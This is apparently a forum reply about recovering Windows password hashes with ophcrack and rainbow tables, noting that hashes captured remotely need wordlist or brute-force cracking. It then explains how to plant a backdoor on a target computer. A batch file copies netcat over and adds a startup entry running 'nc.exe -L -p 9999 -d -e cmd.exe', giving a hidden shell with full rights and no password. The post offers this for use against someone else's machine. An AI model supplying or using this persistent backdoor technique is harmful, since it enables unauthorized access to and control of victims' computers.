Do you want to do it remotely? Cuz ophcrack will get you the password hashes only locally on the system its running on. Remember, once you get the hash remotely it saves it as "NTLM session security" hash, locally it saves it "LM & NTLM" hash, as soon as it is "NTLM Session Security" Ophcrack and rainbowcrack cannot crack it because they use an attack called "cryptanalysis attack" which uses pre generated tables to crack the password in seconds and they can only crack "LM", "LMchall", HALFLMChall", "NTLM", "NTLMChall", "FASTLM", MSCACHE, MD2, MD4, MD5, SHA1, RipeMD 160, MySQL 323, MySQLsha1, CISCOPIX, SHA256, SHA384, SHA512, Oracle, and with the right tool WPA-PSK. So if you do it remotely you will have to use a wordlist or bruteforce to crack the password. You can always read up on netcat and then write a nice batchfile to get you access without needing any user or pass. The batchfile will copy netcat from your computer to the target computer once the target computer executes the batchfile, then it copies a batchfile to the target computer's startup folder which in turn then executes this command with netcat the everytime the target starts up:

nc.exe -L -p 9999 -d -e cmd.exe

so now the moment you telnet to port 9999 on the target computer you will have full rights on there without ever needed a password. But the netcat trick only works if the target computer is on your local network.